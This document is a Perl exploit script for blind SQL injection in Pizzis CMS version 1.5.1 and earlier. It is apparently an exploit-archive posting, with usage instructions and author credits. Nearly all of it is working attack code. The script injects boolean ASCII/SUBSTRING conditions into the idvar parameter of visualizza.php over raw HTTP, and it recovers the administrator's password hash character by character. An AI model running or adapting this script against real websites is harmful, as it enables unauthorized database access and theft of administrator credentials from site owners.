|
--+++=============================================================+++-- --+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++-- --+++=============================================================+++--
#!/usr/bin/perl
use strict; use warnings; use IO::Socket;
sub usage { die "\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit". "\n[+] Author: darkjoker". "\n[+] Site : http://darkjoker.net23.net". "\n[+] Usage : perl $0 <hostname> <path> <username>". "\n[+] Ex. : perl $0 localhost /pizziscms admin". "\n[+] Greetz: my girlfriend, she has no idea about what is it <3". "\n\n"; }
sub query { my ($user, $chr, $pos) = @_; my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user = '${user}'),${pos},1))=${chr}"; $query =~ s/ /%20/g; $query =~ s/'/%27/g; return $query; }
sub exploit { my ($hostname, $path, $user, $chr, $pos) = @_; $chr = ord ($chr);
my $sock = new IO::Socket::INET ( PeerHost => $hostname, PeerPort => 80, Proto => "tcp", ) or die $!;
my $query = query ($user, $chr, $pos); my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n". "Host: ${hostname}\r\n". "Connection: Close\r\n\r\n";
print $sock $request;
my $reply; while (<$sock>) { $reply .= $_;
} close ($sock);
$reply =~ s/\s/ /g;
$reply =~ /<h4>(.+)\/h4>/; if (length ($1) > 1) { return 1; } else { return 0; } }
if (scalar (@ARGV) != 3) { usage (); }
my ($hostname, $path, $user) = @ARGV;
my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789'); my $pos = 1; my $chr = 0;
print "[+] Password: "; while ($pos <= 32) { if (exploit ($hostname, $path, $user, $key [$chr], $pos)) { print $key [$chr]; $chr = -1; $pos++; } $chr++; }
print "\n";
|
|
|